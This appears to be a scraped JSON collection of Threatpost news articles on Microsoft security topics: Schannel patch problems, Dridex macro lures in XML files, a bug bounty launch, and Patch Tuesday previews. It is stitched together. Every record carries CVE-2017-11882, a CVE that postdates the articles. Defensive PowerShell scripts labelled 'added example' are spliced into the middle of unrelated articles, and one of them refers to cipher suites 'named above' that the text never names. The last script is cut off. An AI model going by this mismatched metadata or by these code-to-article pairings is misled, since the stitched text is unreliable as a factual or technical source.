The update addresses the vulnerability by correcting how Schannel sanitizes specially crafted packets,\u201d Microsoft said in its [advisory](<https://technet.microsoft.com/library/security/MS14-066>).\n", "cvss3": {}, "published": "2014-11-17T09:30:34", "type": "threatpost", "title": "Issues Arise With MS14-066 Schannel Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-18T19:54:58", "id": "THREATPOST:9C0FA678FF748B08478CA83EAAEF83B4", "href": "https://threatpost.com/issues-arise-with-ms14-066-schannel-patch/109385/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:15", "description": "Not long ago, criminals pushing the Dridex banking Trojan were using [Microsoft Excel documents spiked with a malicious macro](<http://threatpost.com/dridex-banking-trojan-spreading-via-office-macros/110255>) as a phishing lure to entice victims to load the malware onto their machines.\n\nEven though macros are disabled by default inside most organizations, the persistent hackers are still at it, this time using XML files as a lure.\n\nResearchers at Trustwave today said that over the past few days, several hundred messages have been corralled that are trying to exploit users\u2019 trust in Office documents with some clever social engineering thrown into the mix in an attempt to convince users to enable macros and thus download the banking malware onto their machines.\n\nThe XML files are passed off as \u201cremittance advice,\u201d or payment notifications, with the hopes that some users will believe it\u2019s an innocent text file and execute the malicious code.\n\n\u201cXML files are the old binary format for Office docs and once you double click them to open, the file associated with Microsoft Word and opens,\u201d said Karl Sigler, Trustwave threat intelligence manager. 
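The cipher suite removal recommended in the MS14-066 Schannel item above, as an added example that is not part of the original article or of Microsoft's KB 2992611. It assumes the suite order lives in the Group Policy "SSL Cipher Suite Order" registry value (the `Functions` string under `HKLM:\SOFTWARE\Policies\Microsoft\Cryptography\Configuration\SSL\00010002`, an assumed location that should be checked against the KB for the Windows version in hand), removes the four suites named above, and backs up the previous list first. If no policy value exists, Schannel is running on its built-in order and the script changes nothing.

```powershell
# Added example (not from the article or from Microsoft's KB 2992611).
# Removes the four GCM cipher suites named in the KB from the Schannel
# cipher suite order list.  The registry location is an assumption based on
# where Group Policy stores the "SSL Cipher Suite Order" setting; the value
# is a comma-separated list in a REG_SZ named "Functions".
# Run elevated; reboot afterwards so every Schannel consumer picks it up.
[CmdletBinding(SupportsShouldProcess = $true)]
param(
    [string]$KeyPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Cryptography\Configuration\SSL\00010002',
    [string[]]$SuitesToRemove = @(
        'TLS_DHE_RSA_WITH_AES_256_GCM_SHA384',
        'TLS_DHE_RSA_WITH_AES_128_GCM_SHA256',
        'TLS_RSA_WITH_AES_256_GCM_SHA384',
        'TLS_RSA_WITH_AES_128_GCM_SHA256'
    )
)

function Get-CipherSuiteOrder {
    param([string]$Path)
    $item = Get-ItemProperty -Path $Path -Name Functions -ErrorAction SilentlyContinue
    if (-not $item) { return @() }
    # "Functions" is one comma-separated string; normalise whitespace and drop empties.
    return @(($item.Functions -split ',') | ForEach-Object { $_.Trim() } | Where-Object { $_ })
}

function Remove-CipherSuites {
    param([string[]]$Current, [string[]]$Remove)
    $removeSet = @{}
    foreach ($s in $Remove) { $removeSet[$s] = $true }
    # Preserve the administrator's ordering of everything that stays.
    return @($Current | Where-Object { -not $removeSet.ContainsKey($_) })
}

$current = Get-CipherSuiteOrder -Path $KeyPath
if ($current.Count -eq 0) {
    Write-Warning "No cipher suite order policy at $KeyPath; Schannel is using its built-in default order, so there is nothing to edit here."
    return
}

$wanted  = Remove-CipherSuites -Current $current -Remove $SuitesToRemove
$dropped = @($current | Where-Object { $wanted -notcontains $_ })

if ($dropped.Count -eq 0) {
    Write-Host 'None of the target suites are present; no change.'
    return
}

Write-Host "Removing: $($dropped -join ', ')"
if ($PSCmdlet.ShouldProcess($KeyPath, "Set Functions to $($wanted.Count) suites")) {
    # Keep the previous list so the change can be reverted after testing.
    $backup = Join-Path $env:TEMP ('schannel-functions-{0:yyyyMMdd-HHmmss}.txt' -f (Get-Date))
    Set-Content -Path $backup -Value ($current -join ',')
    Set-ItemProperty -Path $KeyPath -Name Functions -Value ($wanted -join ',')
    Write-Host "Previous list backed up to $backup"
}
```

Run it once with `-WhatIf` to see which suites would be dropped, then without. Removing suites from the order list is a workaround that narrows what the server will negotiate, so it belongs on a test system first and should be reverted (restore the backed-up list) once Microsoft's re-released update is in place.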
The malicious macro is compressed and Base64 encoded in order to slide through detection technology, Sigler said, adding that the attackers have also included a pop-up with instructions for the user on how to enable macros with language that stresses macros must be enabled for the invoice to be viewed properly or to ensure proper security. \u201cWhich is the exact opposite of what this does,\u201d Sigler said. \u201cIt doesn\u2019t seem to be all that sophisticated. They\u2019re either trying to capitalize on a user\u2019s trust in XML files, or the fact that a user may not be that familiar with what that extension is.\u201d\n\nIf the user does follow through and execute the malware, Dridex behaves like most banking Trojans. It sits waiting for a user to visit an online banking site and then injects code onto the bank site in order to capture the user\u2019s credentials for their online account.\n\nSigler said this is the first time they\u2019ve spotted XML docs used as a lure. As for macros, they\u2019ve been disabled by default since Office 2007 was released.\n\n\u201cSometimes in large organizations, local administrators have the ability to enable macros,\u201d Sigler said. \u201cSome organizations use them quite a bit, but it\u2019s not common. Most people leave the default settings. It\u2019s hard to say why these guys moved to XML. It could be that they\u2019re looking for a new attack vector and they weren\u2019t getting good click-through rates with the Excel documents. Maybe they were not getting people to enable macros the way they hoped and they\u2019re looking for a way to better their success rate.\u201d\n\nDridex is a descendant of Cridex and is in the GameOver Zeus family. GameOver Zeus has been used for years to great profit, particularly through wire fraud. It used a peer-to-peer architecture to spread and send stolen goods, opting to forgo a centralized command-and-control. 
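A way to triage such attachments before a user ever opens one, as an added example that is not from the article or from Trustwave: it parses a Word 2003 XML (WordML) file, pulls every base64 `w:binData` blob, decodes it and classifies it by its leading bytes. The element names, the `mso-application` processing instruction and the `ActiveMime` marker are this example's assumptions about how Word stores an embedded macro project in that format, and the sample document at the bottom is constructed, not a real lure.

```powershell
# Added example (not from the article or from Trustwave): flags Word 2003 XML
# ("WordML") files that carry an embedded binary blob, which is where a VBA
# project lives in that format.  Assumptions: the blob sits in a w:binData
# element as base64 (its w:name, e.g. editdata.mso, is attacker-controlled),
# and a decoded blob beginning with "ActiveMime" is the compressed OLE
# container Word uses for the macro project.
$WordMlNs = 'http://schemas.microsoft.com/office/word/2003/wordml'

function Test-WordMlForMacroBlob {
    param([Parameter(Mandatory)][string]$XmlText)

    $doc = New-Object System.Xml.XmlDocument
    $doc.LoadXml($XmlText)

    # The mso-application PI is what makes Windows hand a .xml file to Word,
    # which is the trust the lure relies on.
    $isWordMl = $false
    foreach ($node in $doc.ChildNodes) {
        if ($node.NodeType -eq 'ProcessingInstruction' -and
            $node.Name -eq 'mso-application' -and
            $node.Value -match 'Word\.Document') { $isWordMl = $true }
    }

    $ns = New-Object System.Xml.XmlNamespaceManager($doc.NameTable)
    $ns.AddNamespace('w', $WordMlNs)

    $findings = @()
    foreach ($bin in $doc.SelectNodes('//w:binData', $ns)) {
        $name = $bin.GetAttribute('name', $WordMlNs)
        try { $bytes = [Convert]::FromBase64String(($bin.InnerText -replace '\s', '')) }
        catch {
            $findings += [pscustomobject]@{ Name = $name; Bytes = 0; Kind = 'undecodable-base64' }
            continue
        }
        $head = [System.Text.Encoding]::ASCII.GetString($bytes, 0, [Math]::Min(10, $bytes.Length))
        $kind = if ($head.StartsWith('ActiveMime')) { 'ActiveMime (compressed OLE, likely VBA project)' }
                elseif ($bytes.Length -ge 4 -and $bytes[0] -eq 0xD0 -and $bytes[1] -eq 0xCF -and
                        $bytes[2] -eq 0x11 -and $bytes[3] -eq 0xE0) { 'raw OLE compound file' }
                else { 'other binary (image or unknown)' }
        $findings += [pscustomobject]@{ Name = $name; Bytes = $bytes.Length; Kind = $kind }
    }

    $hits = @($findings | Where-Object { $_.Kind -like 'ActiveMime*' -or $_.Kind -like 'raw OLE*' })
    [pscustomobject]@{
        IsWordMl   = $isWordMl
        Suspicious = $isWordMl -and ($hits.Count -gt 0)
        Blobs      = $findings
    }
}

# Constructed sample (not a real Dridex lure): a minimal WordML document whose
# embedded blob begins with the ActiveMime marker.
$fakeBlob = [Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes('ActiveMime' + ('x' * 64)))
$sample = @"
<?xml version="1.0" standalone="yes"?>
<?mso-application progid="Word.Document"?>
<w:wordDocument xmlns:w="$WordMlNs">
  <w:docOleData>
    <w:binData w:name="editdata.mso">$fakeBlob</w:binData>
  </w:docOleData>
  <w:body><w:p><w:r><w:t>Remittance advice</w:t></w:r></w:p></w:body>
</w:wordDocument>
"@

Test-WordMlForMacroBlob -XmlText $sample | Format-List

# Over a folder of quarantined attachments:
# Get-ChildItem .\attachments\*.xml |
#   ForEach-Object { Test-WordMlForMacroBlob (Get-Content $_ -Raw) | Add-Member NoteProperty File $_.Name -PassThru }
```

The check is deliberately structural rather than signature-based: a `.xml` "remittance advice" that carries an OLE container at all is the anomaly, whatever the macro inside it does, so the detection survives the compression and encoding the attackers added to evade content scanners.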
P2P and domain generation algorithm techniques make botnet takedowns difficult and extend the lifespan of such malware schemes. The previous Dridex campaign targeted U.K. banking customers with spam messages spoofing popular companies either based or active in the U.K. Separate spam spikes using macros started in October and continued right through mid-December; messages contained malicious attachments claiming to be invoices from a number of sources, including shipping companies, retailers, software companies, financial institutions and others.\n", "cvss3": {}, "published": "2015-03-06T13:38:40", "type": "threatpost", "title": "Dridex Banking Trojan Spreading Via Macros in XML Files", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-03-10T11:23:01", "id": "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "href": "https://threatpost.com/dridex-banking-trojan-spreading-via-macros-in-xml-files/111503/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:06", "description": "Microsoft had always rejected the possibility of a [full-scale bug bounty](<http://threatpost.com/microsofts-bug-bounty-program-and-the-law-of-unintended-consequences/101038>), relying instead on solid relationships it spent the better part of a decade fostering with researchers worldwide who submit vulnerabilities to the Microsoft Security Research Center (MSRC).\n\nYet in the past couple of years, the company has bent a bit in the other direction, instituting reward programs for researchers who develop new bypasses for exploit mitigations, or defensive techniques that can be folded into Microsoft products.\n\nThe company has already paid out several hundred thousands of dollars to researchers who have successfully [beaten exploit mitigations in Windows](<https://threatpost.com/microsoft-launches-100000-bug-bounty-program/101015>), including ASLR, DEP, SEHOP and more, as well as 
rewarding one researcher $200,000 for a new technique to [defend against return-oriented programming (ROP) attacks](<https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712>).\n\nIndividual vulnerability payouts have been off the board for the most part (Microsoft did institute a [temporary bounty for Internet Explorer 11](<http://threatpost.com/researchers-nab-28k-in-microsoft-bug-bounty-program/102535>) in the summer of 2013), until today when Microsoft launched the [Microsoft Online Services Bug Bounty Program](<http://technet.microsoft.com/en-us/security/dn800983>). Bounties start at $500, and vulnerabilities in cloud-based services such as Office 365 are the first eligible in the program, Microsoft said.\n\n\u201cGenerally, bounties will be paid for significant web application vulnerabilities found in eligible online service domains,\u201d Microsoft said in a statement announcing the program, adding that researchers must also submit concise steps that will allow Microsoft engineers to reproduce the vulnerability.\n\nOnly certain domains are eligible, Microsoft said. 
That list includes:\n\n * portal.office.com\n * *.outlook.com (Office 365 for business email services applications, excluding any consumer \u201coutlook.com\u201d services)\n * outlook.office365.com\n * login.microsoftonline.com\n * *.sharepoint.com\n * *.lync.com\n * *.officeapps.live.com\n * www.yammer.com\n * api.yammer.com\n * adminwebservice.microsoftonline.com\n * provisioningapi.microsoftonline.com\n * graph.windows.net\n\nOnly certain vulnerability classes are eligible as well, including cross-site scripting, cross-site request forgery, insecure direct object references, injection and authentication flaws, server-side code execution, privilege escalation, security configuration issues and cross-tenant data tampering or access eligible in multitenant services, Microsoft said.\n\n\u201cThe aim of the bug bounty is to uncover significant vulnerabilities that have a direct and demonstrable impact to the security of our users and our users\u2019 data,\u201d Microsoft said.\n\nMicrosoft also listed a number of vulnerabilities that are ineligible; those include:\n\n * Missing HTTP Security Headers (such as X-FRAME-OPTIONS) or cookie security flags (such as \u201chttponly\u201d)\n * Server-side information disclosure such as IPs, server names and most stack traces\n * Bugs in the web application that only affect unsupported browsers and plugins\n * Bugs used to enumerate or confirm the existence of users or tenants\n * Bugs requiring unlikely user actions\n * URL Redirects (unless combined with another flaw to produce a more severe vulnerability)\n * Vulnerabilities in platform technologies that are not unique to the online services in question (Apache or IIS vulnerabilities, for example.)\n * \u201cCross Site Scripting\u201d bugs in SharePoint that require \u201cDesigner\u201d or higher privileges in the target\u2019s tenant.\n * Low impact CSRF bugs (such as logoff)\n * Denial of Service issues\n * Cookie replay vulnerabilities\n\nMicrosoft also made it clear 
that it wants researchers to shy away from denial-of-service testing or any type of automated testing of its services that could lead to significant traffic sent their way. Researchers are also discouraged from trying to access data belonging to someone else consuming a cloud service or expanding a test to include social engineering or phishing against Microsoft employees.\n\nMicrosoft said complete submissions can be sent to [secure@microsoft.com](<mailto:secure@microsoft.com>).\n", "cvss3": {}, "published": "2014-09-23T15:52:05", "type": "threatpost", "title": "Microsoft Online Services Bug Bounty Program Launches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-23T19:52:05", "id": "THREATPOST:222B126A673B8B22370D386B699A7F90", "href": "https://threatpost.com/microsoft-starts-online-services-bug-bounty/108486/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:57", "description": "Appropriately enough for the start of the baseball season, Microsoft is going to go 4-for-4 and release another set of critical Internet Explorer patches on Tuesday, the fourth consecutive month in which serious vulnerabilities in the browser are being addressed in Microsoft\u2019s Patch Tuesday monthly security updates.\n\nThe browser patches are expected to address vulnerabilities first brought to light and exploited last month during the [Pwn2Own contest](<https://threatpost.com/pwn2own-browser-exploits-getting-harder-more-expensive-find-030613/>) at the CanSecWest Conference. All three major browsers\u2014IE, Mozilla Firefox and Google Chrome\u2014were taken down with zero-day exploits during the contest. [Mozilla and Google issued patches for the vulnerabilities](<https://threatpost.com/mozilla-and-google-patch-browser-flaws-used-pwn2own-030813/>) within 24 hours. 
IE users have been exposed since the March 7 contest; details on the IE bugs, however, have not been publicly disclosed.\n\n\u201cEven with their new, more aggressive IE patch cadence they\u2019re still behind other browsers that don\u2019t stick to a monthly patch schedule,\u201d said Andrew Storms, director of security operations at security company nCircle. \u201cThis probably isn\u2019t a huge problem for enterprise security teams because the bug hasn\u2019t been publicly released.\u201d\n\nIE has been a vehicle for many noteworthy attacks this year, including a series of [watering hole attacks](<https://threatpost.com/ie-zero-day-watering-hole-attack-expands-handful-political-sites-010313/>) against human rights and political organizations that exploited zero-day vulnerabilities in IE. Those vulnerabilities were patched in an out-of-band security update.\n\n[Next week\u2019s patches](<http://technet.microsoft.com/en-us/security/bulletin/ms13-apr>) address remote code execution vulnerabilities rated critical in IE 10 on Windows 8 systems, IE 8 and 9 on Windows 7, IE 7 and 8 for Vista and IE 6, 7 and 8 on Windows XP.\n\nThe [out-of-band patch](<https://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/>) fixed memory corruption vulnerabilities in the browser that were exploited in watering hole attacks against the Council on Foreign Relations website, as well as a number of manufacturing and human rights sites. 
The emergency repair was necessitated when hackers were able to bypass a Fix It mitigation provided by Microsoft.\n\nShortly thereafter [in February\u2019s security update release](<https://threatpost.com/microsoft-patches-critical-ie-vulnerabilities-021213/>), additional IE vulnerabilities in versions 6-10 were patched, including one being exploited in the wild.\n\nLast month, [Microsoft released a cumulative update for the browser](<https://threatpost.com/critical-ie-windows-kernel-flaws-patched-031213-0/>), and came a few days after IE 10 running on a Windows 8 machine was compromised at Pwn2Own. The IE patches repaired nine use-after free vulnerabilities, one of which was being exploited in targeted attacks.\n\nThe IE update is one of two critical bulletins expected next week. The second addresses remote code execution vulnerabilities in Windows.\n\nSeven other bulletins are expected next week, all of them rated important, including an information disclosure flaw in Microsoft Office and Microsoft SharePoint Server 2013, the company said.\n\nThe remaining important bulletins are privilege escalation vulnerabilities in Windows, Microsoft Office Web Apps 2010 Service Pack 1, Microsoft SharePoint Server 2010 Service Pack 1, Microsoft Groove Server 2010 Service Pack 1 and Windows Defender for Windows 8 and Windows RT.\n\n\u201cThe number of bulletins isn\u2019t the only factor IT security teams consider when they review a patch so, even though the overall patch count is a little higher than average this month and only two of the bulletins merit a critical rating, it\u2019s too early to assume it\u2019s going to be an easy month,\u201d Storms said.\n", "cvss3": {}, "published": "2013-04-04T18:44:53", "type": "threatpost", "title": "Microsoft Expected to Patch Pwn2Own IE Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-07T17:45:39", "id": "THREATPOST:80D12F3888B999E484D206D5EBA9EEA0", "href": 
"https://threatpost.com/microsoft-expected-patch-pwn2own-ie-vulnerabilities-040413/77700/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:18", "description": "SAN FRANCISCO\u2013The concept of threat modeling has evolved quite a lot in the last few years, moving from an activity that massive software companies such as Microsoft and Google use to anticipate and defend against potential threats to their products to something that many smaller organizations practice. Starting a threat modeling system can seem daunting, but the good news is that there\u2019s no one right way to do it, just the right way for a given organization.\n\nMicrosoft has been using some form of threat modeling internally for many years now and the company\u2019s security group has spent a lot of time speaking publicly about the benefits of the practice and advocating for wider adoption of it. [Adam Shostack](<https://threatpost.com/adam-shostack-science-security-and-value-thinking-differently-040709/72705>), a program manager in Microsoft\u2019s Trustworthy Computing group, has been one of the main proponents of threat modeling\u2019s use, and he said that he\u2019s reached the conclusion that threat modeling is not one defined set of methods or principles but a fluid and dynamic way of reducing security risks to products and services.\n\n\u201cI now think of threat modeling like Legos. There are things you can snap together and use what you need,\u201d he said during a talk at the RSA Conference here Wednesday. \u201cThere\u2019s no one way to threat model. The right way is the way that fixes good threats.\u201d\n\nSecurity experts often will tell developers that in order to build defensible and resilient products, they need to think like an attacker. That is, look at the product or system the way that a potential adversary would see it, find the weak spots that are ripe for exploitation and correct them. 
But Shostack said that isn\u2019t exactly the most useful advice.\n\n\u201cBeing told to think like an attacker is like being told to think like a professional chef,\u201d said Shostack, who recently published a new [book](<http://threatmodelingbook.com/>) on the topic, _Threat Modeling: Designing for Security_. \u201cA lot of security people like to cook, but if someone told you to go to the store and buy enough chickens for a restaurant that seats 78 people and turns over three times a night, you\u2019d have no idea what to do.\u201d\n\nAs with nearly everything in security these days, there are a number of methodologies, models, checklists and other aids designed to help organizations implement threat modeling. Those tools can be useful and have their places, Shostack said, but none of them should be seen as the perfect answer. Rather, use them as part of the process of putting building blocks in place as you construct a threat modeling program.\n\n\u201cWe want to focus on finding good threats. Use your assets and the actions of attackers to make threats real,\u201d he said. \u201cIt\u2019s hard to go from a checklist to a broader system. You have to think about threat modeling your software as an end-to-end process.\u201d\n\nOf course, even the best and most well-constructed threat modeling program still has to deal with the most unpredictable and dangerous threat to the product: the end user. Trying to predict how users will misuse, abuse and break a piece of software is a fool\u2019s errand, but Shostack said it\u2019s still up to the professionals to put their products in the best position to survive in today\u2019s environment.\n\n\u201cTo tell people that they can\u2019t use their computers for what they want is a battle we\u2019re going to lose over and over again,\u201d he said. \u201cPeople don\u2019t buy their computers to be secure. 
They buy them to watch dancing babies.\u201d\n", "cvss3": {}, "published": "2014-02-26T14:14:34", "type": "threatpost", "title": "Threat Modeling, Legos and Dancing Babies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-03T22:04:34", "id": "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "href": "https://threatpost.com/threat-modeling-legos-and-dancing-babies/104517/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:32", "description": "Dennis Fisher talks with Ryan Naraine about whether exploit mitigations such as ASLR and DEP really make any difference in preventing browser attacks and the seriousness of the MS12-020 RDP vulnerability that was patched during March\u2019s Patch Tuesday release.\n\n<https://media.threatpost.com/wp-content/uploads/sites/103/2012/03/07052332/digital_underground_951.mp3>\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on [](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n", "cvss3": {}, "published": "2012-03-15T20:33:31", "type": "threatpost", "title": "Ryan Naraine on Exploit Mitigations and the MS12-020 RDP Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T19:32:37", "id": "THREATPOST:96C5FAF7B7238F498D3BFD523344AA56", "href": "https://threatpost.com/ryan-naraine-exploit-mitigations-and-ms12-020-rdp-bug-031512/76335/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:41", "description": "Microsoft has announced it will issue nine bulletins for its July Patch Tuesday release next week. 
Included in the update are three critical patches for security holes that, if left unaddressed, could result in remote code execution on vulnerable systems.\n\nIn all, the Redmond, Washington company will address 16 vulnerabilities in Microsoft Windows, Internet Explorer, Microsoft Office, and the Server Software and Developer Tools products. The bulk of the releases \u2013 six updates \u2013 are rated \u201cimportant\u201d by Microsoft, which suggests they could be used to compromise systems, but not by self-spreading malware. Most deal with elevation of privilege vulnerabilities.\n\nMicrosoft hasn\u2019t said what vulnerabilities the patches will address. However, it is possible that at least one of the patches will fix a hole in Microsoft\u2019s XML Core Services. The vulnerability, [disclosed in mid-June](<https://threatpost.com/microsoft-warns-xml-vulnerability-being-actively-exploited-061312/>), allows remote code execution through Internet Explorer and is being actively exploited.\n\nHere\u2019s a rundown of the bulletins:\n\nBulletin ID | Maximum Severity Rating and Vulnerability Impact | Restart Requirement | Affected Software\n---|---|---|---\nBulletin 1 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>), Remote Code Execution | May require restart | Microsoft Windows\nBulletin 2 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>), Remote Code Execution | Requires restart | Microsoft Windows, Internet Explorer\nBulletin 3 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>), Remote Code Execution | May require restart | Microsoft Windows\nBulletin 4 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>), Remote Code Execution | May require restart | Microsoft Office, Microsoft Developer Tools\nBulletin 5 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>), Elevation of Privilege | Requires restart | Microsoft Windows\n
Bulletin 6 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>), Remote Code Execution | Requires restart | Microsoft Windows\nBulletin 7 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>), Information Disclosure | Requires restart | Microsoft Windows\nBulletin 8 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>), Elevation of Privilege | May require restart | Microsoft Office, Microsoft Server Software\nBulletin 9 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>), Elevation of Privilege | Does not require restart | Microsoft Office\n\nThis is the first monthly patch release to use a new and improved version of Windows Update that fixes a vulnerability previously used by the Flame malware. [News broke last month that the malware used a forged Microsoft certificate](<https://threatpost.com/flame-attackers-used-collision-attack-forge-microsoft-certificate-060512/>) to validate its components, impersonating a Windows Update mechanism and installing malicious code in its place.\n\nAs usual, Microsoft will push the patches next Tuesday, July 10, around 1 p.m. EST. 
Those looking for more information on the updates should read Microsoft\u2019s advance notification on [Technet](<http://technet.microsoft.com/en-us/security/bulletin/ms12-jul>).\n", "cvss3": {}, "published": "2012-07-06T15:03:10", "type": "threatpost", "title": "Microsoft Plans To Fix 16 Vulnerabilities With July Patch Release", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:54", "id": "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "href": "https://threatpost.com/microsoft-plans-fix-16-vulnerabilities-july-patch-release-070612/76774/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:41", "description": "Microsoft announced yesterday that it will complement the [two-factor authentication](<http://threatpost.com/microsoft-reportedly-adding-two-factor-authentication-user-accounts-041013>) it enabled for account holders in April with [additional security features](<http://blogs.technet.com/b/microsoft_blog/archive/2013/12/09/new-security-features-added-to-microsoft-accounts.aspx>) designed to deny account hijacking and unauthorized access.\n\nWindows PC and mobile users, along with Outlook, SkyDrive, Xbox, Skype and other Microsoft services users will soon have three new capabilities to further prop up their accounts.\n\nThe most novel may be a dashboard view that presents a user with a log of recent activity, such as log-in attempts\u2014including failed attempts\u2014as well as the addition or deletion of security information and the type of device and browser used for a particular activity. Location is displayed on a map, as well as timestamp data.\n\n\u201cYou know best what\u2019s been happening with your account \u2013 so the more we give you tools to understand what\u2019s happening, the better we can work together to protect your account,\u201d wrote Eric Doerr, a group program manager at Microsoft. 
\u201cFor example, a login from a new country might look suspicious to us, but you might know that you were simply on vacation or on a business trip.\u201d\n\nUsers who determine there has been suspicious or unauthorized activity can click on a \u201cThis wasn\u2019t me\u201d button that will then display steps the user can take to secure their accounts.\n\nIn addition, users who have already enabled [two-factor authentication](<http://blogs.technet.com/b/microsoft_blog/archive/2013/04/17/microsoft-account-gets-more-secure.aspx>) will be able to generate a recovery code to access their accounts without having to use the information provided during the setup of two-factor.\n\n\u201cBecause two-step verification setup requires two verified pieces of security information, like a phone number and email address, it will be a rare occasion when both options fail, but in the event they do, we\u2019ve got you covered,\u201d Doerr said.\n\nMicrosoft said that any account user will be able to add a recovery code to their account, but users will be able to request only one recovery code at a time; requesting a new one cancels the old one, Doerr said.\n\n\u201cYour recovery code is like a spare key to your house,\u201d Doerr said. \u201cSo make sure you store it in a safe place.\u201d\n\nThe final new feature users may expect is additional management of security notifications, such as password resets. Users will be able to select, for example, whether they want security notifications sent to an email address or a mobile device via text message.\n\nMicrosoft account holders have had two-factor authentication at their disposal since April. 
Users are asked to provide two pieces of security information that Microsoft stores; the user will enter a password, for example, and then have a code sent to their mobile device as a second authenticator.\n\nMicrosoft also released an Authenticator app for Windows Phone; the app is built on a standard authentication protocol meaning that it could be used on other Web-based services such as those offered by Google, Dropbox and others.\n", "cvss3": {}, "published": "2013-12-10T08:00:18", "type": "threatpost", "title": "Microsoft Protects User Accounts with New Security Features", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-12-10T00:55:21", "id": "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "href": "https://threatpost.com/microsoft-adds-new-security-features-to-accounts/103138/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:06", "description": "Microsoft has released some [updated guidance on the recent DLL-hijacking bug](<http://blogs.technet.com/b/srd/>), including a new FixIt tool that enables the workaround for the vulnerability that Microsoft shipped late last month. \n\nThe new guidance includes a detailed explanation of the bug itself as well as how potential attacks would work and what users can do to protect themselves. In a blog post, Jonathan Ness of the Microsoft Security Response Center Engineering Team, explained that there are a number of different potential attack vectors, including a WebDAV share.\n\n\u201cUnfortunately, based on attack patterns we have seen in recent years, \nwe believe it is no longer safe to browse to a malicious, untrusted \nWebDAV server in the Internet Zone and double-click on **_any_** \ntype of files. Attackers are clever, substituting dangerous file icons \nwith safe, trusted file icons. 
They have even recently begun obfuscating the filename based on character encoding tricks (such as right-to-left character encoding). Their goal is to entice unsuspecting users into double-clicking on a malicious executable. With or without this new remote vector to the DLL Preloading issue, it\u2019s very hard to make a trust decision given the amount of control an attacker has over the malicious WebDAV server browsing experience. We recommend users only double-click on file icons from WebDAV shares known to be trusted, safe, and not under the control of a malicious attacker,\u201d Ness said.\n\nThe company had already published a workaround for the DLL bug, which involves editing the registry to create a new entry, along with a downloadable tool. Because the protection that tool installs was turned off by default, Microsoft has now published a new FixIt tool that enables it automatically.\n\nHere are the steps that Microsoft recommends:\n\n * Install the tool from [KB2264107](<http://support.microsoft.com/kb/2264107>).\n * Log on to your computer as an administrator. \n * Open Registry Editor. \n * Locate and then click the following registry subkey: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\n * Right-click Session Manager, point to New, and then click DWORD Value.\n * Type CWDIllegalInDllSearch, and then click Modify. \n * In the Value data box, type 0xFFFFFFFF, and then click OK.\n\nThe company warns that there could be unforeseen issues, so users should test the fix before deploying it. 
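The registry workaround above, scripted: this is an added example, not Microsoft's FixIt tool and not code from the article. It writes the system-wide CWDIllegalInDllSearch value from an elevated PowerShell prompt and reads it back. It assumes the KB2264107 update is installed, since the loader ignores the value without it. The meanings of the values other than 0xFFFFFFFF (1 and 2) are taken from KB2264107 and are included so a less aggressive setting can be chosen where removing the current directory from the search order entirely breaks an application.

```powershell
#Requires -RunAsAdministrator
# Added example (not the FixIt tool): set and read the CWDIllegalInDllSearch mitigation from KB2264107.
# Assumes KB2264107 is installed; without it the registry value is ignored by the loader.

$SessionManager = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'
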